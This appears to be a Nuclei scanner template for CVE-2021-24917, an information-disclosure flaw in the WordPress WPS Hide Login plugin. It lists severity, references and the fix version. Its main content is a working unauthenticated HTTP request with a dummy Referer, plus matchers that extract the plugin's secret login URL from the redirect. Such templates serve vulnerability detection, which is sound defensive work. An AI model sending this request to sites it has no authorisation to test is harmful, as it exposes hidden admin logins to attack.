51 lines
1.7 KiB
YAML
51 lines
1.7 KiB
YAML
id: CVE-2021-24917
|
|
|
|
info:
|
|
name: WordPress WPS Hide Login <1.9.1 - Information Disclosure
|
|
author: akincibor
|
|
severity: high
|
|
description: WordPress WPS Hide Login plugin before 1.9.1 is susceptible to incorrect authorization. An attacker can obtain the secret login page by setting a random referer string and making a request to /wp-admin/options.php as an unauthenticated user. This reveals the secret login location.
|
|
remediation: Fixed in version 1.9.1.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/15bb711a-7d70-4891-b7a2-c473e3e8b375
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-24917
|
|
- https://wordpress.org/support/topic/bypass-security-issue/
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2021-24917
|
|
cwe-id: CWE-863
|
|
epss-score: 0.04369
|
|
epss-percentile: 0.91403
|
|
cpe: cpe:2.3:a:wpserveur:wps_hide_login:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: wpserveur
|
|
product: wps_hide_login
|
|
framework: wordpress
|
|
tags: cve2021,wp,wordpress,wp-plugin,unauth,wpscan,cve
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /wp-admin/options.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Referer: something
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- "!contains(tolower(location), 'wp-login.php')"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- 'redirect_to=%2Fwp-admin%2Fsomething&reauth=1'
|
|
|
|
extractors:
|
|
- type: kval
|
|
kval:
|
|
- location
|
|
# digest: 4a0a00473045022034a3f76a8d28b219975d175c815770c5eeae7563d92bb8cc8d9b59137472299b022100d6a342f12799751615b15be2cd182c3a358ca2d35e432872656c4ca1df0dc2cf:922c64590222798bb761d5b6d8e72950 |